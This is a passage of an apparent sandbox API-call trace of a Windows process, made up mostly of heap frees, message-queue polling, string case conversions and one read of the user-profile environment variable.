hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.302] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.303] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.303] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.303] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.303] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0252.306] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.306] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.306] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.306] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0252.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.307] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.307] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.307] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0252.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.307] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.307] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.308] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.308] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.311] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.311] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.311] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.311] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.311] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.311] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.311] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.311] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.311] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.311] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.312] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.312] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.312] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.312] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.312] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.312] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.312] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.312] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.312] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.312] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0252.312] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.312] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.313] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.313] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.313] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.313] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.313] FreeLibrary (hLibModule=0x74d40000) returned 1 [0252.313] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.313] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.315] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.315] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.316] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.316] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0252.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0252.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.316] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 